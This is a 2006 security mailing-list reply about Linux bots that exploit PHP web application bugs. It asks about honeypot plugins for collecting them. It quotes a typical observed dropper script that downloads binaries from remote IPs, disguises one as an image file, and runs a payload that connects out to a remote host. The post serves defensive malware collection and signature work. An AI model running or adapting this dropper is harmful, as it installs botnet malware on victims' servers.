Re: new linux malware

["Jamie Riden" <jamie.riden () gmail com>]

On 21/02/06, Gadi Evron <ge () linuxbox org> wrote:
> Indeed, it has become an annoying trend everybody talks about but nobody
> writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either
> vulnerabilities in know applications such as WordPress, PHPBB, Drupal,
> etc. or actually trying different permutations to attack the site.
<snip>
> Anyone else seeing their web server logs going crazy with new patterns
> every day? Email me, I am starting a sharing system where these can be
> shared mutually so we can better protect ourselves, create signatures, etc.

I got as far as looking at mwcollect and nepenthes to see if anyone
had written plugins to slurp these bots, but couldn't find anything.
Typically they're some sort of variant on:

#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd

with payloads being variously identified as Kaiten, Linux.RST and
Lupii by Symantec AV. This is just stuff trying the old awstats
exploit, I haven't coded up any handlers for the xml-rpc, or other
exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable
:) collecting the malware?

cheers,
 Jamie